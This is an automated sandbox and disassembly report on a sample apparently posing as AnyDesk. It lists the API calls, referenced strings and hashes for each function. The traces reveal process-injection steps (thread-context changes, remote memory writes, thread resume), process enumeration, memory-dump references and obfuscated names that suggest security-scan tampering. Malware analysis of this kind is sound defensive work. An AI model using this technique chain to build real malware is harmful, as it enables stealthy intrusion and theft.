Function 02B2E3FC Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 02B2E43C

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: b508999e57487f79505b651a55e1a4868dd91aa46921b10e203c3e372f7e9447
Instruction ID: 1eaa7a610f5378385f7c718e2228f99dfeaaac8337b658d3f0d16a8350c09200
Opcode Fuzzy Hash: b508999e57487f79505b651a55e1a4868dd91aa46921b10e203c3e372f7e9447
Instruction Fuzzy Hash: A63152716003289BEB11DFAAC884AAE77E8EB0D304F4845E5F91DD7150D734FA58CBA1

Function 02B389D0 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B381CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B3823C,?,?,00000000,?,02B37A7E,ntdll,00000000,00000000,02B37AC3,?,?,00000000), ref: 02B3820A
Part of subcall function 02B381CC: GetModuleHandleA.KERNELBASE(?), ref: 02B3821E

Part of subcall function 02B38274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B382FC,?,?,00000000,00000000,?,02B38215,00000000,KernelBASE,00000000,00000000,02B3823C), ref: 02B382C1
Part of subcall function 02B38274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B382C7
Part of subcall function 02B38274: GetProcAddress.KERNEL32(?,?), ref: 02B382D9

Part of subcall function 02B37D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37DEC

Part of subcall function 02B38338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B383C2), ref: 02B383A4

FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02BA738C,Function_0000662C,00000004,02BA739C,02BA738C,05F5E103,00000040,02BA73A0,74F60000,00000000,00000000), ref: 02B38AAA

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
String ID:
API String ID: 1478290883-0
Opcode ID: 30c7d4c2d27eb3ae798cd7ff5d543b29742a4a6cf9a098f2c63a5edf81d07e9e
Instruction ID: 8601dfc06aec5363dc7fe73c033588e07800b6df05eb57c881bed1f4bb5efc1e
Opcode Fuzzy Hash: 30c7d4c2d27eb3ae798cd7ff5d543b29742a4a6cf9a098f2c63a5edf81d07e9e
Instruction Fuzzy Hash: 222178B1784314AFE701FBB4DC12B5EB7EAEB04700F5144E0BA08E7690DE74A905AE19

Function 02B36D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02B36DB9,?,?,?,00000000), ref: 02B36D99

Part of subcall function 02B24C60: SysFreeString.OLEAUT32(02B3F4A4), ref: 02B24C6E

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 1ab93a9e6080fde90e68277f42bde56b27881d97e0193af9478b38d72f968d9e
Instruction ID: 7dffcfd7a88d8f505e5388477e8025d78af3dfab694d1818e3dcbbf5672c7dd2
Opcode Fuzzy Hash: 1ab93a9e6080fde90e68277f42bde56b27881d97e0193af9478b38d72f968d9e
Instruction Fuzzy Hash: C8E0ED35200318BBE312EB66EC41D8E7BADDF8A750B9204F1F90493A10EA31AE088C64

Function 02B25868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B25886

Part of subcall function 02B25ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B20000,02B4E790), ref: 02B25AE8
Part of subcall function 02B25ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4E790), ref: 02B25B06
Part of subcall function 02B25ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4E790), ref: 02B25B24
Part of subcall function 02B25ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B25B42
Part of subcall function 02B25ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B25BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B25B8B
Part of subcall function 02B25ACC: RegQueryValueExA.ADVAPI32(?,02B25D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B25BD1,?,80000001), ref: 02B25BA9
Part of subcall function 02B25ACC: RegCloseKey.ADVAPI32(?,02B25BD8,00000000,?,?,00000000,02B25BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B25BCB

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction ID: 062a1001addb9ae27a5172b319f55340a8bff66b5df012d8c99e679a7deb1b4a
Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction Fuzzy Hash: FFE06D71A103248FCB24DE9CC8C0B8633D8AB08750F440AA1EC68CF246D7B0D9588BD0

Function 02B27E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02B4041F,ScanString,02BA7380,02B4B7B8,OpenSession,02BA7380,02B4B7B8,ScanString,02BA7380,02B4B7B8,UacScan,02BA7380,02B4B7B8,UacInitialize), ref: 02B27E67

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f0603f79c985abbd9e467084389eeeab23f229ce479b25f1777e651fb4263a00
Instruction ID: 86336ec6bf3ce39b4e4b35ba45aac498f0027d27ac03b264e20274b46391a92e
Opcode Fuzzy Hash: f0603f79c985abbd9e467084389eeeab23f229ce479b25f1777e651fb4263a00
Instruction Fuzzy Hash: 76C08CB02013300A5A6079BC2CC4289528E8B082383640AE1A43CD62E2DB2A98AE3838

Function 02B4C35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02B4C350,00000000,00000001), ref: 02B4C36C

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 73e2e0bdc75c960d3990fdf965297bc3587b52470fb3f5dc485621ef01bdaa4e
Instruction ID: 4973d69f8ed4625c20935bf3e89b4af0f3562350cda12dc0f4d7493c007e3a00
Opcode Fuzzy Hash: 73e2e0bdc75c960d3990fdf965297bc3587b52470fb3f5dc485621ef01bdaa4e
Instruction Fuzzy Hash: 25C092F2B913003AFA109BA56CC6F371A9DD709B54F204592B708EE2C1D6F76C145E68

Function 02B215CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B21A03,?,02B22000), ref: 02B215E2

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8e5068d190c6880fb20af85d3ec8039fdd192a7cc844fda9abb26c83d6febed9
Instruction ID: b6b8197ba888c0be38c5434dccf5b3795854f7d045cb0ed581840512da02e2cd
Opcode Fuzzy Hash: 8e5068d190c6880fb20af85d3ec8039fdd192a7cc844fda9abb26c83d6febed9
Instruction Fuzzy Hash: 72F06DF0B513809FDB09CFB999413157BF6E78A384F1085BDE609DB399E7B184058B00

Function 02B21682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B22000), ref: 02B216A4

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b81990c909d6ee26e6fa0670b5724d775caa630fde6150515758164f124ea80e
Instruction ID: cb0fd669d8be9e044b956042f291e2561a6e25cc6ac3a475bc0d76ca925b8310
Opcode Fuzzy Hash: b81990c909d6ee26e6fa0670b5724d775caa630fde6150515758164f124ea80e
Instruction Fuzzy Hash: 1BF02EF2B107A46FDB218F4E9C80B82BB98FB10360F084179FA0C9B340C370A8108B94

Function 02B216E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B21FE4), ref: 02B21704

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 90489a79f99d41b3a82ff7b5f23659c7aa944c223abc3ee1061d73448a2f30b0
Instruction ID: 8cbfec0f996193e03a806ee7fb2220ede049aef56a2eb4c5b2739aeb13790da6
Opcode Fuzzy Hash: 90489a79f99d41b3a82ff7b5f23659c7aa944c223abc3ee1061d73448a2f30b0
Instruction Fuzzy Hash: C2E0CDB53203216FDB105F7D5D407167BDCEB94754F1444B5F54DDB253D260E8188B60

Non-executed Functions

Function 02B3AB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B3ADA3,?,?,02B3AE35,00000000,02B3AF11), ref: 02B3AB30
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B3AB48
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B3AB5A
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B3AB6C
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B3AB7E
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B3AB90
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B3ABA2
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B3ABB4
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B3ABC6
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B3ABD8
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B3ABEA
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B3ABFC
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B3AC0E
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B3AC20
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B3AC32
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B3AC44
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B3AC56

Strings

Heap32Next, xrefs: 02B3AB88
Module32NextW, xrefs: 02B3AC4E
Module32FirstW, xrefs: 02B3AC3C
Module32First, xrefs: 02B3AC18
Heap32ListNext, xrefs: 02B3AB64
Thread32Next, xrefs: 02B3AC06
Toolhelp32ReadProcessMemory, xrefs: 02B3AB9A
Process32NextW, xrefs: 02B3ABE2
Module32Next, xrefs: 02B3AC2A
Heap32ListFirst, xrefs: 02B3AB52
Process32Next, xrefs: 02B3ABBE
CreateToolhelp32Snapshot, xrefs: 02B3AB40
Process32FirstW, xrefs: 02B3ABD0
Process32First, xrefs: 02B3ABAC
Thread32First, xrefs: 02B3ABF4
kernel32.dll, xrefs: 02B3AB2B
Heap32First, xrefs: 02B3AB76

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: f44e5aadfc2c09ff196f578a2602226077dddae26d7f82495cb5b9a0973655ed
Instruction ID: 9440d2ad01d7d727e12a63cec072b37112e87186ae8fa54f539e99317dcda417
Opcode Fuzzy Hash: f44e5aadfc2c09ff196f578a2602226077dddae26d7f82495cb5b9a0973655ed
Instruction Fuzzy Hash: C6315EB0A85360AFFF02EFB4D886A6C77A9EB16740B500CE1B445CF214EB74A804DF11

Function 02B38D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 02B389D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02BA738C,Function_0000662C,00000004,02BA739C,02BA738C,05F5E103,00000040,02BA73A0,74F60000,00000000,00000000), ref: 02B38AAA

GetThreadContext.KERNEL32(00000000,02BA7424,ScanString,02BA73A8,02B3A93C,UacInitialize,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,UacInitialize,02BA73A8), ref: 02B39602

Part of subcall function 02B37D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37DEC

SetThreadContext.KERNEL32(00000000,02BA7424,ScanBuffer,02BA73A8,02B3A93C,ScanString,02BA73A8,02B3A93C,Initialize,02BA73A8,02B3A93C,00000000,-00000008,02BA74FC,00000004,02BA7500), ref: 02B3A317
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02BA7424,ScanBuffer,02BA73A8,02B3A93C,ScanString,02BA73A8,02B3A93C,Initialize,02BA73A8,02B3A93C,00000000,-00000008,02BA74FC), ref: 02B3A324

Part of subcall function 02B3894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BA73A8,02B3A587,ScanString,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,Initialize,02BA73A8,02B3A93C,UacScan), ref: 02B38960
Part of subcall function 02B3894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B3897A
Part of subcall function 02B3894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BA73A8,02B3A587,ScanString,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,Initialize), ref: 02B389B6

Strings

dbgcore, xrefs: 02B3A719, 02B3A72D
OpenSession, xrefs: 02B38DA9, 02B391CC, 02B3927E, 02B3A64F, 02B3A795
I_QueryTagInformation, xrefs: 02B3A700
ntdll, xrefs: 02B3A625, 02B3A639, 02B3A6F1, 02B3A894, 02B3A8A8
Initialize, xrefs: 02B390EA, 02B396F8, 02B3987F, 02B39C68, 02B39ECA, 02B3A03A, 02B3A1AD, 02B3A412, 02B3A743
NtReadVirtualMemory, xrefs: 02B3A620
sppc, xrefs: 02B39376
NtOpenObjectAuditAlarm, xrefs: 02B3A634, 02B3A6EC
BCryptRegisterProvider, xrefs: 02B3A59B
MiniDumpReadDumpStream, xrefs: 02B3A728
ScanBuffer, xrefs: 02B38ECC, 02B38F54, 02B392EF, 02B39404, 02B394A1, 02B397DA, 02B39961, 02B39AF4, 02B39CD9, 02B39DEE, 02B39FAC, 02B3A11C, 02B3A28F, 02B3A483, 02B3A6A1, 02B3A7E7
SLGetLicenseInformation, xrefs: 02B3935F
BCryptQueryProviderRegistration, xrefs: 02B3A587
ScanString, xrefs: 02B38E02, 02B38FAD, 02B3915B, 02B39583, 02B39769, 02B398F0, 02B39D7D, 02B39F3B, 02B3A0AB, 02B3A21E, 02B3A509, 02B3A5B6
MiniDumpWriteDump, xrefs: 02B3A714
advapi32, xrefs: 02B3A705
bcrypt, xrefs: 02B3A578, 02B3A58C, 02B3A5A0
NtSetSecurityObject, xrefs: 02B3A88F
UacInitialize, xrefs: 02B39032, 02B39393, 02B39512, 02B39616, 02B39A12, 02B39B86, 02B3A330
BCryptVerifySignature, xrefs: 02B3A573
NtOpenProcess, xrefs: 02B3A8A3
UacScan, xrefs: 02B38E73, 02B3908B, 02B39687, 02B39A83, 02B39BF7, 02B3A3A1, 02B3A839

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: LibraryThread$ContextFree$AddressLoadMemoryProcResumeVirtualWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 1342636540-51457883
Opcode ID: 6064f0e44fb6e7bb9273f32f2ba9efdecbaf689aa3e994ca60ba0a7784b8e5ab
Instruction ID: cfbbfce1bcc954bc86bc42f25bacaafbd6ed6a1d73d57709c33100b395c9f735
Opcode Fuzzy Hash: 6064f0e44fb6e7bb9273f32f2ba9efdecbaf689aa3e994ca60ba0a7784b8e5ab
Instruction Fuzzy Hash: 7EE2EE35B402289FDB12FB64DC85BCE73BAAF89300F5141E1E149ABA54DE30AE4D9F51

Function 02B38D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON

Download Yara Rule

APIs

Part of subcall function 02B389D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02BA738C,Function_0000662C,00000004,02BA739C,02BA738C,05F5E103,00000040,02BA73A0,74F60000,00000000,00000000), ref: 02B38AAA

GetThreadContext.KERNEL32(00000000,02BA7424,ScanString,02BA73A8,02B3A93C,UacInitialize,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,UacInitialize,02BA73A8), ref: 02B39602

Strings

dbgcore, xrefs: 02B3A719, 02B3A72D
OpenSession, xrefs: 02B38DA9, 02B391CC, 02B3927E, 02B3A64F, 02B3A795
I_QueryTagInformation, xrefs: 02B3A700
ntdll, xrefs: 02B3A625, 02B3A639, 02B3A6F1, 02B3A894, 02B3A8A8
Initialize, xrefs: 02B390EA, 02B396F8, 02B3987F, 02B39C68, 02B39ECA, 02B3A03A, 02B3A1AD, 02B3A412, 02B3A743
NtReadVirtualMemory, xrefs: 02B3A620
sppc, xrefs: 02B39376
NtOpenObjectAuditAlarm, xrefs: 02B3A634, 02B3A6EC
BCryptRegisterProvider, xrefs: 02B3A59B
MiniDumpReadDumpStream, xrefs: 02B3A728
ScanBuffer, xrefs: 02B38ECC, 02B38F54, 02B392EF, 02B39404, 02B394A1, 02B397DA, 02B39961, 02B39AF4, 02B39CD9, 02B39DEE, 02B39FAC, 02B3A11C, 02B3A28F, 02B3A483, 02B3A6A1, 02B3A7E7
SLGetLicenseInformation, xrefs: 02B3935F
BCryptQueryProviderRegistration, xrefs: 02B3A587
ScanString, xrefs: 02B38E02, 02B38FAD, 02B3915B, 02B39583, 02B39769, 02B398F0, 02B39D7D, 02B39F3B, 02B3A0AB, 02B3A21E, 02B3A509, 02B3A5B6
MiniDumpWriteDump, xrefs: 02B3A714
advapi32, xrefs: 02B3A705
bcrypt, xrefs: 02B3A578, 02B3A58C, 02B3A5A0
NtSetSecurityObject, xrefs: 02B3A88F
UacInitialize, xrefs: 02B39032, 02B39393, 02B39512, 02B39616, 02B3A330
BCryptVerifySignature, xrefs: 02B3A573
NtOpenProcess, xrefs: 02B3A8A3
UacScan, xrefs: 02B38E73, 02B3908B, 02B39687, 02B39A83, 02B39BF7, 02B3A3A1, 02B3A839

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: ContextFreeLibraryThread
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 1077026627-51457883
Opcode ID: c58510df845c5c587b4809ec1ff71dd8e36ad8aea48d46c934bf2e1bd060921c
Instruction ID: e0ce9ff297b3628f66c8a662cbd7d31388f3a223a7b404c6ae5b79309b694ba5
Opcode Fuzzy Hash: c58510df845c5c587b4809ec1ff71dd8e36ad8aea48d46c934bf2e1bd060921c
Instruction Fuzzy Hash: 69E2EE35B402289FDB12FB64DC85BCE73BAAF89300F5141E1E149ABA54DE30AE4D9F51

Function 02B25908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02B2737C,02B20000,02B4E790), ref: 02B25925
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B2593C
lstrcpynA.KERNEL32(?,?,?), ref: 02B2596C
